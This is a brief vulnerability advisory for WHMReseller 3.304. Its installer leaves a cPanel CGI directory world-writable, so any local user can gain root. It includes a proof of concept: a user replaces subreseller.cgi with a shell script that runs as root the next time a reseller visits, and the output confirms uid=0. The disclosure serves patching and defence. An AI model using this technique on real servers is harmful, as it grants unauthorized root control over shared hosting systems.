WHMReseller 3.304 - any local user could execute commands as root



DESCRIPTION


World writable permissions on /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller allowed any local user to execute command as root.



IMPACT


Local users could obtain full root access.


When WHMReseller 3.304 was installed, it changed the permissions of the whmreseller/ directory to 0777:

31802 chmod("./whmreseller", 0777)      = 0


As such, you can rename and then recreate any existing file in that directory.

[user@host ~]$ cd /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ mv subreseller.cgi subreseller.cgi.old
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ cat > subreseller.cgi << EOF
#!/bin/sh
/usr/bin/id > /home/user/id.out
EOF


The next time a reseller accesses WHMReseller, your commands in the subreseller.cgi file you created will be executed as root:

[user@host ~]$ cat id.out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)